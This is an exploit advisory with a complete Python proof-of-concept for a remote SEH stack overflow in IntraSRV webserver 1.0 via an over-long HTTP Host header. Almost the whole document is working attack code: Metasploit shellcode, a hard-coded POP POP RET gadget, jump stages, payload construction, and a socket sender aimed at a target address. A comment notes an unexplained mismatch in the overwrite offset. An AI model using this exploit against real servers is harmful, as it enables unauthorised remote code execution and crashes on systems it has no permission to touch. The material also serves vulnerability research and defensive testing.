IntraSRV 1.0 remote SEH overflow

2019.10.27
Author: x00pwn (US)
Risk: High
Local: No
Remote: Yes
CWE: CWE-120


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

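#!/usr/bin/python
# Exploit Title: IntraSRV webserver 1.0 SEH overflow writeup
# Date: 10/10/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.leighb.com
# Software Link: http://www.leighb.com/intrasrv.htm
# Version: 1.0
# Tested on: Windows 7
# CVE : CVE-2019-17181
#
# Proof of concept for a stack buffer overflow (CWE-120) in IntraSRV's
# handling of the HTTP Host header.  An over-long Host value overwrites a
# SEH record on the stack; the chain is
#   SEH handler (POP POP RET in intrasrv.exe)
#     -> nSEH slot: short JMP -10, back into the 8-byte stage 2
#     -> stage 2: JMP rel32 -450, back into the 'A' filler
#     -> filler (0x41 = inc ecx on x86-32) slides forward into the shellcode.
# Run it only against a host you are authorised to test: a successful run
# executes attacker-chosen code inside the server process and a failed run
# normally crashes it.
#
# The script is written to run unchanged under Python 2 and Python 3.  Every
# payload piece is a bytes literal: under Python 3 the original str payload
# would have UTF-8 encoded every byte > 0x7f (corrupting the shellcode),
# str + struct.pack() output would raise TypeError, and socket.send() refuses
# str altogether.
import socket
import sys
from struct import pack

victim_host = "10.0.0.17"
victim_port = 80

# Raw Metasploit output, pasted verbatim from the writeup.  Do not trust an
# opaque shellcode blob copied from a page - regenerate it before use with:
#   msfvenom -p windows/exec CMD=calc.exe -b "\x00\xff\x0d\x0a" EXITFUNC=thread -f python -v shellcode_calc
# The bad-char list is not optional: the payload travels inside an HTTP
# header, so NUL, CR and LF must never appear in it.
shellcode_calc = b""
shellcode_calc += b"\xba\x97\x92\x8c\xa9\xda\xd2\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x2b\xc9\xb1\x31\x31\x57\x13\x83"
shellcode_calc += b"\xc7\x04\x03\x57\x98\x70\x79\x55\x4e\xf6"
shellcode_calc += b"\x82\xa6\x8e\x97\x0b\x43\xbf\x97\x68\x07"
shellcode_calc += b"\xef\x27\xfa\x45\x03\xc3\xae\x7d\x90\xa1"
shellcode_calc += b"\x66\x71\x11\x0f\x51\xbc\xa2\x3c\xa1\xdf"
shellcode_calc += b"\x20\x3f\xf6\x3f\x19\xf0\x0b\x41\x5e\xed"
shellcode_calc += b"\xe6\x13\x37\x79\x54\x84\x3c\x37\x65\x2f"
shellcode_calc += b"\x0e\xd9\xed\xcc\xc6\xd8\xdc\x42\x5d\x83"
shellcode_calc += b"\xfe\x65\xb2\xbf\xb6\x7d\xd7\xfa\x01\xf5"
shellcode_calc += b"\x23\x70\x90\xdf\x7a\x79\x3f\x1e\xb3\x88"
shellcode_calc += b"\x41\x66\x73\x73\x34\x9e\x80\x0e\x4f\x65"
shellcode_calc += b"\xfb\xd4\xda\x7e\x5b\x9e\x7d\x5b\x5a\x73"
shellcode_calc += b"\x1b\x28\x50\x38\x6f\x76\x74\xbf\xbc\x0c"
shellcode_calc += b"\x80\x34\x43\xc3\x01\x0e\x60\xc7\x4a\xd4"
shellcode_calc += b"\x09\x5e\x36\xbb\x36\x80\x99\x64\x93\xca"
shellcode_calc += b"\x37\x70\xae\x90\x5d\x87\x3c\xaf\x13\x87"
shellcode_calc += b"\x3e\xb0\x03\xe0\x0f\x3b\xcc\x77\x90\xee"
shellcode_calc += b"\xa9\x98\x72\x3b\xc7\x30\x2b\xae\x6a\x5d"
shellcode_calc += b"\xcc\x04\xa8\x58\x4f\xad\x50\x9f\x4f\xc4"
shellcode_calc += b"\x55\xdb\xd7\x34\x27\x74\xb2\x3a\x94\x75"
shellcode_calc += b"\x97\x58\x7b\xe6\x7b\xb1\x1e\x8e\x1e\xcd"

# Author's mona notes, kept as published:
#   SEH handler overwritten with - 43336143
#   [*] Exact match at offset 1569
#   Log data, item 23  Address=0BADF00D
#   Message = SEH record (nseh field) at 0x0018ff78 overwritten with normal pattern
# NOTE(review): the script below places nSEH 1553 bytes into the Host value
# while the quoted log says 1569; the writeup does not explain the 16-byte
# difference.  1553 is what the author reports as working, so it is kept.
NSEH_OFFSET = 1553          # bytes of Host value before the nSEH slot
TOTAL_LEN = 4000            # total Host value length sent
LONG_JMP_BACK = 450         # distance of the stage-2 backward jump

# Stage 1 (4 bytes, lands in the nSEH slot): two NOPs then EB F6 = JMP -10.
# Relative to the end of the JMP (offset 1557) that lands at 1547, i.e. on
# the last NOP of stage 2 immediately below.
nseh_stage1 = b"\x90\x90\xEB\xF6"

# Stage 2 (8 bytes, placed directly before nSEH): NOP sled then
# E9 3E FE FF FF = JMP rel32 0xFFFFFE3E (-450).  Relative to the end of that
# instruction (offset 1553) execution lands at offset 1103, inside the 'A'
# filler, and slides forward into the shellcode.
jmp450_stage2 = b"\x90\x90\x90\xE9\x3E\xFE\xFF\xFF"

# Overwrites the SEH handler pointer with a POP EAX / POP EBP / RET gadget:
#   0x004097dd : pop eax # pop ebp # ret | startnull {PAGE_EXECUTE_READ} [intrasrv.exe]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
# A hard-coded address only works because intrasrv.exe is not rebased and
# not SafeSEH-compiled.  "startnull" means the address contains a NUL byte;
# in little-endian form (dd 97 40 00) it is the last byte of the four, so
# the NUL lands after the pointer is already complete.
seh_handler = pack("<L", 0x004097DD)


def build_payload(shellcode=shellcode_calc):
    """Return the Host header value (bytes, exactly TOTAL_LEN long).

    Layout by offset into the returned bytes (for the 220-byte default
    shellcode):
      [0    : 1325]  'A' filler, also the landing zone of the -450 jump
      [1325 : 1545]  shellcode
      [1545 : 1553]  jmp450_stage2
      [1553 : 1557]  nseh_stage1  (overwrites the nSEH pointer)
      [1557 : 1561]  seh_handler  (overwrites the handler pointer)
      [1561 : 4000]  'A' filler

    The filler shrinks as *shellcode* grows, so the SEH record always stays
    at the same offset.

    Raises:
        ValueError: if *shellcode* would not fit before the SEH record, or
            would extend back past the -450 jump target (offset 1103), in
            which case the jump would land inside the shellcode instead of
            in the sled and the chain would silently break.
    """
    stage2_start = NSEH_OFFSET - len(jmp450_stage2)
    shellcode_start = stage2_start - len(shellcode)
    jump_target = NSEH_OFFSET - LONG_JMP_BACK
    if shellcode_start < jump_target:
        raise ValueError(
            "shellcode is %d bytes; at most %d fit between the jump target "
            "and the SEH record" % (len(shellcode), stage2_start - jump_target)
        )

    payload = b"A" * shellcode_start + shellcode
    payload += jmp450_stage2
    payload += nseh_stage1
    payload += seh_handler
    payload += b"A" * (TOTAL_LEN - len(payload))
    return payload


def build_request(payload):
    """Wrap *payload* (bytes) as the Host header value of a HEAD request.

    The request is otherwise minimal; the Host header is the overflowing
    field, the remaining headers are kept exactly as the author sent them.
    """
    request = b"HEAD / HTTP/1.1\r\n"
    request += b"Host:" + payload + b"\r\n"
    request += b"User-Agent: firefox \r\n"
    request += b"If-Modified-Since: Wed \r\n\r\n"
    return request


# Built at import time so the module-level names survive; nothing is sent
# until main() runs.
exploit_payload = build_payload()
http_request = build_request(exploit_payload)


def main(argv=None):
    """Send the crafted request to the target and report progress.

    Args:
        argv: optional [host, [port]] overriding victim_host / victim_port;
            defaults to sys.argv[1:].

    Returns:
        0 when the request was delivered, 1 on a socket error.
    """
    argv = sys.argv[1:] if argv is None else argv
    host = argv[0] if len(argv) > 0 else victim_host
    port = int(argv[1]) if len(argv) > 1 else victim_port

    print("[*] Intrasrv webserver 1.0 SEH overflow POC\n")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # A dead or filtered target should fail fast rather than hang forever.
    sock.settimeout(10)
    try:
        sock.connect((host, port))
        print("[*] Establishing a connection to the victim")
        # sendall() retries partial writes; a 4 KB header can be split by
        # the kernel and a short send() would truncate the overflow.
        sock.sendall(http_request)
        print("[*] Sending the payload")
    except socket.error as exc:
        # Narrow catch: the original bare `except:` also swallowed
        # KeyboardInterrupt and hid the actual reason for the failure.
        print("[!] Exploit failed to send: %s" % exc)
        return 1
    finally:
        sock.close()
    print("[*] Watch for a spawned calc")
    return 0


if __name__ == "__main__":
    sys.exit(main())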

